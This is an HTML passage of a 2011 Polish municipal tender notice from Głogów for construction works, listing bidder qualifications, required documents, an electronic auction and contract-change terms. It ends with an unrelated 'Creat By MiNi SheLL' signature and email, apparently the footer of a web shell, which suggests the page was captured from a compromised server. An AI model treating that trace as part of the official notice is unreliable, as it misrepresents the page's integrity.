</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą się ubiegać wykonawcy,którzy a)	dysponują osobami zdolnymi do wykonania zamówienia tj.: 
-	kierowania robotami budowlanymi w specjalności drogowej w zakresie niezbędnym do wykonania zamówienia,
-	kierowania robotami  budowlanymi  w specjalności instalacyjnej w zakresie sieci wodociągowych, kanalizacyjnych i gazowych w zakresie niezbędnym do wykonania zamówienia,
-	kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci  elektroenergetycznych w zakresie niezbędnym do wykonania zamówienia, 
-	kierowania robotami budowlanymi w specjalności telekomunikacyjnej w zakresie niezbędnym do wykonania zamówienia,
-	kierowania robotami budowlanymi w specjalności mostowej w zakresie niezbędnym do wykonania zamówienia,
-	posiadającymi zaświadczenie w sprawie zezwoleń na prowadzenie prac konserwatorskich przy zabytkach i archeologicznych prac wykopaliskowych lub 2 letnią praktykę zawodową przy zabytkach nieruchomych (należy dołączyć oświadczenie tej osoby),
b)	kadra wyznaczona do kierowania budową musi posiadać stwierdzenie przygotowania zawodowego do wykonywania samodzielnych funkcji w budownictwie (uprawnienia), wpis na listę właściwej Okręgowej Izby Samorządu Zawodowego;
Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu osób ,które będą odpowiedzialne za realizację zamówienia oraz oświadczenia ,że osoby te posiadają wymagane uprawnienia na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą się ubiegać wykonawcy,którzy:
a)	dla zabezpieczenia bieżącego wykonywania robót posiadają środki własne lub dostęp do kredytu w wysokości minimum 1.000.000,00 zł, 
b)	posiadają ubezpieczenie OC z tytułu prowadzonej działalności gospodarczej;
Ocena spełnienia warunku będzie dokonana na podstawie złożonej informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej ,w których wykonawca posiada rachunek potwierdzającej wysokość posiadanych środków finansowych lub zdolnośc kredytową oraz na podstawie złozonego dokumentu potwierdzającego ,że wykonawca jest ubezpieczony od OC ,dowodu jego opłacenia na zasadzie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony  załącznik nr 1 - formularz OFERTA .
2)	Pełnomocnictwo podmiotów występujących wspólnie
3)	Pełnomocnictwo dla osoby podpisującej ofertę i oświadczenia - jeśli uprawnienie tej osoby nie wynika z innych dokumentów dołączonych do oferty
4)	Kosztorys ofertowy opracowany metodą szczegółową
5)	Kopia dowodu wniesienia wadium. 
6)	Wykaz części zamówienia, które wykonawca zamierza zlecić do wykonania podwykonawcom.
7)	Zobowiązania innych podmiotów
8)	W przypadku, gdy osobą uprawnioną do składania ofert w imieniu Wykonawcy w trakcie aukcji elektronicznej będzie inna osoba niż  podpisująca ofertę ,należy załączyć do oferty pełnomocnictwo dla tej osoby, podpisane przez osobę uprawniona do reprezentowania Wykonawcy, z którego wynikać będzie prawo do reprezentowania Wykonawcy w aukcji elektronicznej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: https://aukcjemp.marketplanet.pl/servlet/HomeServlet</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>7.	Zmiany umowy:
7.1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności.
7.2. Niedopuszczalna jest zmiana postanowień zawartej umowy oraz wprowadzanie do umowy postanowień niekorzystnych dla Zamawiającego.
7.3. Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w formie pisemnego aneksu na następujących warunkach :
1)	Wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych                      w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kluczowego specjalistę.
2)	Jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji itp.),
3)	Zamawiający może zażądać od wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że kluczowy  specjalista nie wykonuje swoich obowiązków wynikających z umowy. Wykonawca obowiązany jest zmienić  kluczowego specjalistę zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego. W przypadku zmiany kluczowego specjalisty  nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty,
4)	Za kluczowego specjalistę uważa się kierownika budowy i kierowników robót branżowych.
7.4. Zmiany w umowie będą mogły nastąpić w następujących przypadkach:
1)	wystąpienia istotnych wad dokumentacji projektowej skutkujących koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót mających wpływ na zmianę terminu realizacji - zmianie ulegnie odpowiednio termin realizacji zamówienia,
2)	zaistnienie okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi, warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie mogą ulec termin realizacji umowy oraz terminy wynikające          z harmonogramu rzeczowo - finansowego, 
3)	gdy zaistnieje inna, niemożliwa do przewidzenia  w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia,
4)	wystąpienia przedłużającej się procedury badania i oceny ofert oraz procedury odwoławczej - zmianie może ulec termin realizacji zamówienia,
5)	konieczności wykonania ewentualnych robót zamiennych, zamówień dodatkowych, zamówień uzupełniających - Zamawiający dopuszcza możliwość zmiany umowy,                    w szczególności terminu realizacji zamówienia,
6)	ograniczenia zakresu, czego nie można było przewidzieć mimo dochowania należytej staranności - Zamawiający dopuszcza możliwość zmiany umowy, w tym terminu realizacji zamówienia,
7)	zaistnienia okoliczności na skutek których konieczna jest zmiana harmonogramu rzeczowo - finansowego.
7.5. Pozostałe zmiany:
1)	jeśli zmiana stawki podatku VAT będzie  powodować  zwiększenie  kosztów  wykonania  po stronie  wykonawcy, Zamawiający  dopuszcza  możliwość zwiększenia  wynagrodzenia  o kwotę równą różnicy  w kwocie  podatku  VAT  zapłaconego  przez  wykonawcę, 
2)	jeśli  zmiana  stawki VAT  będzie powodować zmniejszenie  kosztów wykonania  umowy  po stronie wykonawcy, Zamawiający  przewiduje  możliwość  zmniejszenia  wynagrodzenia o kwotę stanowiącą różnicę  kwoty podatku  VAT  do zapłacenia  przez  wykonawcę ,
3)	rezygnacja  przez  zamawiającego z realizacji części   przedmiotu  umowy - w takim przypadku  wynagrodzenie  przysługujące  wykonawcy  zostanie  pomniejszone
7.6. Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 
1)	opis zmiany,
2)	uzasadnienie zmiany,
3)	koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
4)	czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.
Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję techniczną, w składzie której będą m.in. Inspektor Nadzoru oraz Kierownik budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.glogow.sbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Rynek 10 67-200 Głogów pok.314.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2011 godzina 10:00, miejsce: Urząd Miejski Rynek 10 67-200 Głogów pok.125.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com